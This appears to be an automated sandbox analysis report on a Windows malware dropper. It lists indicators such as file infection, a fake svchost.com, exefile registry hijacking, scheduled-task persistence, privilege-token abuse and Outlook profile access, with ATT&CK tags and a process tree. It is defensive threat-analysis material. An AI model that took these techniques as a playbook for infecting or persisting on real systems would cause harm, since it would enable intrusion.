File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\AppSharingHookController.exe	mNXfxi.exe
File opened for modification	C:\Program Files\Mozilla Firefox\uninstall\helper.exe	mNXfxi.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exe	mNXfxi.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\SPREADSHEETCOMPARE.EXE	mNXfxi.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.21012.10511.0_x64__8wekyb3d8bbwe\Music.UI.exe	mNXfxi.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\javaws.exe	mNXfxi.exe
File opened for modification	C:\Program Files\Java\jre-1.8\bin\klist.exe	mNXfxi.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.BingNews_1.0.6.0_x64__8wekyb3d8bbwe\NewsStub.exe	mNXfxi.exe
File opened for modification	C:\PROGRA~2\INTERN~1\ExtExport.exe	log1.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\jar.exe	mNXfxi.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroLayoutRecognizer\AcroLayoutRecognizer.exe	mNXfxi.exe
File opened for modification	C:\PROGRA~2\Adobe\ACROBA~1\Reader\READER~1.EXE	kdmapper.exe
File opened for modification	C:\Program Files (x86)\Google\Update\Install\{7673E9D7-1E54-483C-BAF4-8A8869899842}\chrome_installer.exe	mNXfxi.exe
File opened for modification	C:\PROGRA~2\WINDOW~4\setup_wm.exe	kdmapper.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\native2ascii.exe	mNXfxi.exe
File opened for modification	C:\Program Files\Mozilla Firefox\firefox.exe	mNXfxi.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.2012.21.0_x64__8wekyb3d8bbwe\Calculator.exe	mNXfxi.exe
File opened for modification	C:\PROGRA~2\Adobe\ACROBA~1\Reader\FULLTR~1.EXE	log1.exe
File opened for modification	C:\PROGRA~2\Google\Update\1336~1.151\GOOGLE~3.EXE	log1.exe
File opened for modification	C:\PROGRA~2\MICROS~1\Edge\Application\90.0.818.66\msedge_pwa_launcher.exe	log1.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\jconsole.exe	mNXfxi.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Client\AppVDllSurrogate32.exe	mNXfxi.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\ORGCHART.EXE	mNXfxi.exe
File opened for modification	C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	mNXfxi.exe
File opened for modification	C:\PROGRA~2\MICROS~1\Edge\Application\90.0.818.66\BHO\ie_to_edge_stub.exe	kdmapper.exe
File opened for modification	C:\PROGRA~3\PACKAG~1\{EF6B0~1\VCREDI~1.EXE	kdmapper.exe
File opened for modification	C:\Program Files\Mozilla Firefox\pingsender.exe	mNXfxi.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe	mNXfxi.exe
File opened for modification	C:\PROGRA~2\MOZILL~1\MAINTE~1.EXE	kdmapper.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\tnameserv.exe	mNXfxi.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\EQUATION\eqnedt32.exe	mNXfxi.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	mNXfxi.exe
File opened for modification	C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.2\createdump.exe	mNXfxi.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\SDXHelperBgt.exe	mNXfxi.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.BingWeather_1.0.6.0_x64__8wekyb3d8bbwe\WeatherStub.exe	mNXfxi.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.StorePurchaseApp_12008.1001.1.0_x64__8wekyb3d8bbwe\StoreExperienceHost.exe	mNXfxi.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrServicesUpdater.exe	mNXfxi.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exe	mNXfxi.exe
File opened for modification	C:\PROGRA~2\Adobe\ACROBA~1\Reader\ACROTE~1.EXE	kdmapper.exe
File opened for modification	C:\Program Files\Java\jre-1.8\bin\kinit.exe	mNXfxi.exe
File opened for modification	C:\Program Files (x86)\Google\Update\1.3.36.151\GoogleUpdateSetup.exe	mNXfxi.exe
File opened for modification	C:\Program Files\Mozilla Firefox\plugin-container.exe	mNXfxi.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\110.0.5481.104\chrome_pwa_launcher.exe	mNXfxi.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\rmid.exe	mNXfxi.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\ssvagent.exe	mNXfxi.exe
File opened for modification	C:\Program Files\Java\jre-1.8\bin\ssvagent.exe	mNXfxi.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\MSQRY32.EXE	mNXfxi.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\SDXHelper.exe	mNXfxi.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\filecompare.exe	mNXfxi.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.XboxSpeechToTextOverlay_1.17.29001.0_x64__8wekyb3d8bbwe\SpeechToTextOverlay64-Retail.exe	mNXfxi.exe
File opened for modification	C:\PROGRA~2\INTERN~1\ExtExport.exe	kdmapper.exe
File opened for modification	C:\PROGRA~3\KJDHCA~1.EXE	svchost.com
File opened for modification	C:\Program Files (x86)\Windows Mail\wab.exe	mNXfxi.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.40978.0_x64__8wekyb3d8bbwe\codecpacks.heif.exe	mNXfxi.exe
File opened for modification	C:\Program Files\7-Zip\7zFM.exe	mNXfxi.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\MSOSREC.EXE	mNXfxi.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Analysis Services\AS OLEDB\140\SQLDumper.exe	mNXfxi.exe
File opened for modification	C:\Program Files\Windows Mail\wabmig.exe	mNXfxi.exe

Drops file in Windows directory 64 IoCs

Processes:

msedge.exesvchost.comsvchost.comsvchost.comsvchost.comsvchost.comsvchost.comsvchost.comsvchost.comsvchost.comlog1.exesvchost.comsvchost.comsvchost.comsvchost.comsvchost.comsvchost.comsvchost.comsvchost.comsvchost.comsvchost.comsvchost.comsvchost.comsvchost.comsvchost.comlog2.exemsedge.exeexplorti.exesvchost.comsvchost.comsvchost.comsvchost.comsvchost.commsedge.exesvchost.comsvchost.comsvchost.comsvchost.comsvchost.comsvchost.comsvchost.comsvchost.comamadka.exe

description	ioc	Process
File opened for modification	C:\Windows\svchost.com	msedge.exe
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\svchost.com	log1.exe
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\directx.sys	log2.exe
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\directx.sys	msedge.exe
File created	C:\Windows\Tasks\explorti.job	explorti.exe
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\directx.sys	msedge.exe
File opened for modification	C:\Windows\directx.sys	msedge.exe
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\svchost.com	msedge.exe
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\directx.sys	svchost.com
File created	C:\Windows\Tasks\explorti.job	amadka.exe

Launches sc.exe 20 IoCs

Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid	Process
3752	sc.exe
3200	sc.exe
7960	sc.exe
4952	sc.exe
3884	sc.exe
6320	sc.exe
2480	sc.exe
5732	sc.exe
5036	sc.exe
9188	sc.exe
6124	sc.exe
1644	sc.exe
3136	sc.exe
3084	sc.exe
8616	sc.exe
7084	sc.exe
4652	sc.exe
1820	sc.exe
8536	sc.exe
6520	sc.exe

Access Token Manipulation: Create Process with Token 1 TTPs 1 IoCs

defense_evasion privilege_escalation

Create Process with Token

T1134.002

Processes:

mshta.exe

pid	Process
5624	mshta.exe

Detects Pyinstaller 1 IoCs

pyinstaller

Processes:

resource	yara_rule
behavioral2/files/0x000200000002aae0-2092.dat	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 19 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	Process	procid_target
1244	2936	WerFault.exe	83
1988	5064	WerFault.exe	113
3136	924	WerFault.exe	121
416	1744	WerFault.exe	126
2516	3836	WerFault.exe	137
5308	5196	WerFault.exe	209
6512	2816	WerFault.exe	268
5428	7212	WerFault.exe	335
5192	5736	WerFault.exe	357
1988	2776	WerFault.exe	129
7572	4716	WerFault.exe	380
4692	6520	WerFault.exe	454
6152	4792	WerFault.exe	458
8836	5144	WerFault.exe	609
7604	5524	WerFault.exe	619
6744	4204	WerFault.exe	649
8988	8004	WerFault.exe	415
7700	8332	WerFault.exe	655
9044	6780	WerFault.exe	666

NSIS installer 2 IoCs

installer

Processes:

resource	yara_rule
behavioral2/files/0x000100000002aba0-8077.dat	nsis_installer_1
behavioral2/files/0x000100000002aba0-8077.dat	nsis_installer_2

Checks processor information in registry 2 TTPs 4 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

RegAsm.exeAnyDesk.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	RegAsm.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	RegAsm.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	AnyDesk.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	AnyDesk.exe

Delays execution with timeout.exe 4 IoCs

evasion

Processes:

timeout.exetimeout.exetimeout.exetimeout.exe

pid	Process
6628	timeout.exe
6996	timeout.exe
7584	timeout.exe
9008	timeout.exe

Enumerates processes with tasklist 1 TTPs 2 IoCs

Process Discovery

T1057

Processes:

tasklist.exetasklist.exe

pid	Process
5180	tasklist.exe
8004	tasklist.exe

Kills process with taskkill 2 IoCs

evasion

Processes:

taskkill.exetaskkill.exe

pid	Process
5144	taskkill.exe
6864	taskkill.exe

Modifies registry class 13 IoCs

Processes:

log2.exeRegAsm.exeXClient2.exelog1.exemsedge.exemsedge.exe1.exemsedge.exeamadka.exeexplorti.exekdmapper.exeNew Text Document mod.exeasec.exe

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000_Classes\Local Settings	log2.exe
Key created	\REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000_Classes\Local Settings	RegAsm.exe
Key created	\REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000_Classes\Local Settings	XClient2.exe
Key created	\REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000_Classes\Local Settings	log1.exe
Key created	\REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000_Classes\Local Settings	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000_Classes\Local Settings	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000_Classes\Local Settings	1.exe
Key created	\REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000_Classes\Local Settings	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000_Classes\Local Settings	amadka.exe
Key created	\REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000_Classes\Local Settings	explorti.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*"	kdmapper.exe
Key created	\REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000_Classes\Local Settings	New Text Document mod.exe
Key created	\REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000_Classes\Local Settings	asec.exe

Modifies registry key 1 TTPs 2 IoCs

Modify Registry

T1112

Processes:

reg.exereg.exe

pid	Process
2164	reg.exe
7584	reg.exe

Runs ping.exe 1 TTPs 4 IoCs

Remote System Discovery

T1018

Processes:

PING.EXEPING.EXEPING.EXEPING.EXE

pid	Process
4920	PING.EXE
6728	PING.EXE
2424	PING.EXE
6216	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 26 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid	Process
2636	schtasks.exe
5312	schtasks.exe
9056	schtasks.exe
900	schtasks.exe
6536	schtasks.exe
6372	schtasks.exe
7776	schtasks.exe
4792	schtasks.exe
6800	schtasks.exe
5400	schtasks.exe
6448	schtasks.exe
7020	schtasks.exe
5788	schtasks.exe
4912	schtasks.exe
4388	schtasks.exe
5264	schtasks.exe
5836	schtasks.exe
7520	schtasks.exe
3536	schtasks.exe
4692	schtasks.exe
8140	schtasks.exe
5796	schtasks.exe
6184	schtasks.exe
6788	schtasks.exe
1468	schtasks.exe
6744	schtasks.exe

Suspicious behavior: EnumeratesProcesses 63 IoCs

Processes:

justrat.exeANTIMA~1.EXERegAsm.exeGOOGLE~1.EXEpowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe1.exeRegAsm.exeamadka.exeAnyDesk.exeexplorti.exeexplorti.exeexplorti.exe

pid	Process
4136	justrat.exe
4140	ANTIMA~1.EXE
4136	justrat.exe
2888	RegAsm.exe
2888	RegAsm.exe
4140	ANTIMA~1.EXE
3320	GOOGLE~1.EXE
4136	justrat.exe
4136	justrat.exe
4136	justrat.exe
4136	justrat.exe
4136	justrat.exe
4136	justrat.exe
4136	justrat.exe
4136	justrat.exe
4136	justrat.exe
4136	justrat.exe
4136	justrat.exe
4136	justrat.exe
2888	RegAsm.exe
2888	RegAsm.exe
4580	powershell.exe
4580	powershell.exe
4580	powershell.exe
4136	justrat.exe
4136	justrat.exe
4136	justrat.exe
4136	justrat.exe
4136	justrat.exe
4136	justrat.exe
4136	justrat.exe
4136	justrat.exe
3176	powershell.exe
3176	powershell.exe
236	powershell.exe
236	powershell.exe
4712	powershell.exe
4712	powershell.exe
1392	powershell.exe
1392	powershell.exe
4116	1.exe
3176	powershell.exe
4116	1.exe
236	powershell.exe
1392	powershell.exe
2932	RegAsm.exe
2932	RegAsm.exe
4712	powershell.exe
3320	GOOGLE~1.EXE
3320	GOOGLE~1.EXE
3320	GOOGLE~1.EXE
1124	amadka.exe
1124	amadka.exe
4464	AnyDesk.exe
4464	AnyDesk.exe
5716	explorti.exe
5716	explorti.exe
784	explorti.exe
784	explorti.exe
5304	explorti.exe
5304	explorti.exe
2888	RegAsm.exe
2888	RegAsm.exe

Suspicious use of AdjustPrivilegeToken 30 IoCs

Processes:

New Text Document mod.exejustrat.exeANTIMA~1.EXEmeta2806.exeGOOGLE~1.EXE1.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeRegAsm.exeigccu.exeXClient2.exeXClient.exeSlovakia.exeLOADED~1.EXEXClient.exeXCLIEN~1.EXE

description	pid	Process
Token: SeDebugPrivilege	4708	New Text Document mod.exe
Token: SeDebugPrivilege	4136	justrat.exe
Token: SeDebugPrivilege	4140	ANTIMA~1.EXE
Token: SeDebugPrivilege	4660	meta2806.exe
Token: SeBackupPrivilege	4660	meta2806.exe
Token: SeSecurityPrivilege	4660	meta2806.exe
Token: SeSecurityPrivilege	4660	meta2806.exe
Token: SeSecurityPrivilege	4660	meta2806.exe
Token: SeSecurityPrivilege	4660	meta2806.exe
Token: SeDebugPrivilege	3320	GOOGLE~1.EXE
Token: SeDebugPrivilege	4116	1.exe
Token: SeDebugPrivilege	4580	powershell.exe
Token: SeDebugPrivilege	3176	powershell.exe
Token: SeDebugPrivilege	236	powershell.exe
Token: SeDebugPrivilege	4712	powershell.exe
Token: SeDebugPrivilege	1392	powershell.exe
Token: SeDebugPrivilege	4116	1.exe
Token: SeDebugPrivilege	2932	RegAsm.exe
Token: SeDebugPrivilege	1736	igccu.exe
Token: SeDebugPrivilege	5344	XClient2.exe
Token: SeDebugPrivilege	5580	XClient.exe
Token: SeDebugPrivilege	5424	Slovakia.exe
Token: SeDebugPrivilege	5780	LOADED~1.EXE
Token: SeDebugPrivilege	4376	XClient.exe
Token: SeBackupPrivilege	4660	meta2806.exe
Token: SeSecurityPrivilege	4660	meta2806.exe
Token: SeSecurityPrivilege	4660	meta2806.exe
Token: SeSecurityPrivilege	4660	meta2806.exe
Token: SeSecurityPrivilege	4660	meta2806.exe
Token: SeDebugPrivilege	5272	XCLIEN~1.EXE

Suspicious use of FindShellTrayWindow 14 IoCs

Processes:

snukingorig2.5.exego.exeAnyDesk.exeamadka.exe

pid	Process
2936	snukingorig2.5.exe
2936	snukingorig2.5.exe
1576	go.exe
1576	go.exe
1576	go.exe
1576	go.exe
1576	go.exe
1724	AnyDesk.exe
1576	go.exe
1724	AnyDesk.exe
1124	amadka.exe
1724	AnyDesk.exe
1576	go.exe
1576	go.exe

Suspicious use of SendNotifyMessage 13 IoCs

Processes:

snukingorig2.5.exego.exeAnyDesk.exe

pid	Process
2936	snukingorig2.5.exe
2936	snukingorig2.5.exe
1576	go.exe
1576	go.exe
1576	go.exe
1576	go.exe
1576	go.exe
1724	AnyDesk.exe
1576	go.exe
1724	AnyDesk.exe
1724	AnyDesk.exe
1576	go.exe
1576	go.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

1.exe

pid	Process
4116	1.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

New Text Document mod.exesnukingorig2.5.exelog1.exelog2.exesvchost.comcsrss.exelog2.exeigccu.exemNXfxi.exesvchost.com

description	pid	Process	procid_target
PID 4708 wrote to memory of 4952	4708	New Text Document mod.exe	82
PID 4708 wrote to memory of 4952	4708	New Text Document mod.exe	82
PID 4708 wrote to memory of 4952	4708	New Text Document mod.exe	82
PID 4708 wrote to memory of 2936	4708	New Text Document mod.exe	83
PID 4708 wrote to memory of 2936	4708	New Text Document mod.exe	83
PID 4708 wrote to memory of 2936	4708	New Text Document mod.exe	83
PID 2936 wrote to memory of 4068	2936	snukingorig2.5.exe	84
PID 2936 wrote to memory of 4068	2936	snukingorig2.5.exe	84
PID 2936 wrote to memory of 4068	2936	snukingorig2.5.exe	84
PID 4708 wrote to memory of 1728	4708	New Text Document mod.exe	88
PID 4708 wrote to memory of 1728	4708	New Text Document mod.exe	88
PID 4708 wrote to memory of 3148	4708	New Text Document mod.exe	90
PID 4708 wrote to memory of 3148	4708	New Text Document mod.exe	90
PID 4708 wrote to memory of 3148	4708	New Text Document mod.exe	90
PID 4708 wrote to memory of 4504	4708	New Text Document mod.exe	91
PID 4708 wrote to memory of 4504	4708	New Text Document mod.exe	91
PID 4708 wrote to memory of 4504	4708	New Text Document mod.exe	91
PID 4708 wrote to memory of 4312	4708	New Text Document mod.exe	92
PID 4708 wrote to memory of 4312	4708	New Text Document mod.exe	92
PID 4708 wrote to memory of 4312	4708	New Text Document mod.exe	92
PID 4504 wrote to memory of 1764	4504	log1.exe	93
PID 4504 wrote to memory of 1764	4504	log1.exe	93
PID 4504 wrote to memory of 1764	4504	log1.exe	93
PID 4312 wrote to memory of 560	4312	log2.exe	94
PID 4312 wrote to memory of 560	4312	log2.exe	94
PID 4312 wrote to memory of 560	4312	log2.exe	94
PID 560 wrote to memory of 3120	560	svchost.com	95
PID 560 wrote to memory of 3120	560	svchost.com	95
PID 560 wrote to memory of 3120	560	svchost.com	95
PID 1728 wrote to memory of 5104	1728	csrss.exe	96
PID 1728 wrote to memory of 5104	1728	csrss.exe	96
PID 1728 wrote to memory of 5104	1728	csrss.exe	96
PID 1728 wrote to memory of 5104	1728	csrss.exe	96
PID 1728 wrote to memory of 5104	1728	csrss.exe	96
PID 1728 wrote to memory of 5104	1728	csrss.exe	96
PID 1728 wrote to memory of 5104	1728	csrss.exe	96
PID 1728 wrote to memory of 5104	1728	csrss.exe	96
PID 1728 wrote to memory of 5104	1728	csrss.exe	96
PID 1728 wrote to memory of 5104	1728	csrss.exe	96
PID 1728 wrote to memory of 5104	1728	csrss.exe	96
PID 1728 wrote to memory of 5104	1728	csrss.exe	96
PID 3120 wrote to memory of 3144	3120	log2.exe	98
PID 3120 wrote to memory of 3144	3120	log2.exe	98
PID 3120 wrote to memory of 3144	3120	log2.exe	98
PID 3120 wrote to memory of 3316	3120	log2.exe	99
PID 3120 wrote to memory of 3316	3120	log2.exe	99
PID 4952 wrote to memory of 1736	4952	igccu.exe	101
PID 4952 wrote to memory of 1736	4952	igccu.exe	101
PID 4952 wrote to memory of 1736	4952	igccu.exe	101
PID 4952 wrote to memory of 1736	4952	igccu.exe	101
PID 4952 wrote to memory of 1736	4952	igccu.exe	101
PID 4952 wrote to memory of 1736	4952	igccu.exe	101
PID 4952 wrote to memory of 1736	4952	igccu.exe	101
PID 4952 wrote to memory of 1736	4952	igccu.exe	101
PID 4952 wrote to memory of 1736	4952	igccu.exe	101
PID 3144 wrote to memory of 4636	3144	mNXfxi.exe	102
PID 3144 wrote to memory of 4636	3144	mNXfxi.exe	102
PID 3144 wrote to memory of 4636	3144	mNXfxi.exe	102
PID 4708 wrote to memory of 4624	4708	New Text Document mod.exe	104
PID 4708 wrote to memory of 4624	4708	New Text Document mod.exe	104
PID 4708 wrote to memory of 4624	4708	New Text Document mod.exe	104
PID 4624 wrote to memory of 4756	4624	svchost.com	105
PID 4624 wrote to memory of 4756	4624	svchost.com	105
PID 4708 wrote to memory of 2704	4708	New Text Document mod.exe	108

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

Processes:

attrib.exe

pid	Process
2864	attrib.exe

outlook_office_path 1 IoCs

Processes:

igccu.exe

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	igccu.exe

outlook_win_path 1 IoCs

Processes:

igccu.exe

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	igccu.exe

C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe
"C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe"
1⤵
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4708
- C:\Users\Admin\AppData\Local\Temp\a\igccu.exe
  "C:\Users\Admin\AppData\Local\Temp\a\igccu.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory
  PID:4952
- - C:\Users\Admin\AppData\Local\Temp\a\igccu.exe
    "C:\Users\Admin\AppData\Local\Temp\a\igccu.exe"
    3⤵
    - Executes dropped EXE
    - Accesses Microsoft Outlook profiles
    - Suspicious use of AdjustPrivilegeToken
    - outlook_office_path
    - outlook_win_path
    PID:1736
- C:\Users\Admin\AppData\Local\Temp\a\snukingorig2.5.exe
  "C:\Users\Admin\AppData\Local\Temp\a\snukingorig2.5.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory
  PID:2936
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
    "C:\Users\Admin\AppData\Local\Temp\a\snukingorig2.5.exe"
    3⤵
    PID:4068
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2936 -s 724
    3⤵
    - Program crash
    PID:1244
- C:\Users\Admin\AppData\Local\Temp\a\csrss.exe
  "C:\Users\Admin\AppData\Local\Temp\a\csrss.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory
  PID:1728
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
    3⤵
    PID:5104
- C:\Users\Admin\AppData\Local\Temp\a\kdmapper.exe
  "C:\Users\Admin\AppData\Local\Temp\a\kdmapper.exe"
  2⤵
  - Executes dropped EXE
  - Modifies system executable filetype association
  - Drops file in Program Files directory
  - Modifies registry class
  PID:3148
- C:\Users\Admin\AppData\Local\Temp\a\log1.exe
  "C:\Users\Admin\AppData\Local\Temp\a\log1.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in Program Files directory
  - Drops file in Windows directory
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID:4504
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\log1.exe"
    3⤵
    - Executes dropped EXE
    - Drops file in Windows directory
    PID:1764
- C:\Users\Admin\AppData\Local\Temp\a\log2.exe
  "C:\Users\Admin\AppData\Local\Temp\a\log2.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in Windows directory
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID:4312
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\log2.exe"
    3⤵
    - Executes dropped EXE
    - Drops file in Windows directory
    - Suspicious use of WriteProcessMemory
    PID:560
  - - C:\Users\Admin\AppData\Local\Temp\3582-490\log2.exe
      C:\Users\Admin\AppData\Local\Temp\3582-490\log2.exe
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:3120
    - - C:\Users\Admin\AppData\Local\Temp\mNXfxi.exe
        
        C:\Users\Admin\AppData\Local\Temp\mNXfxi.exe
        5⤵
        Executes dropped EXE
        Drops file in Program Files directory
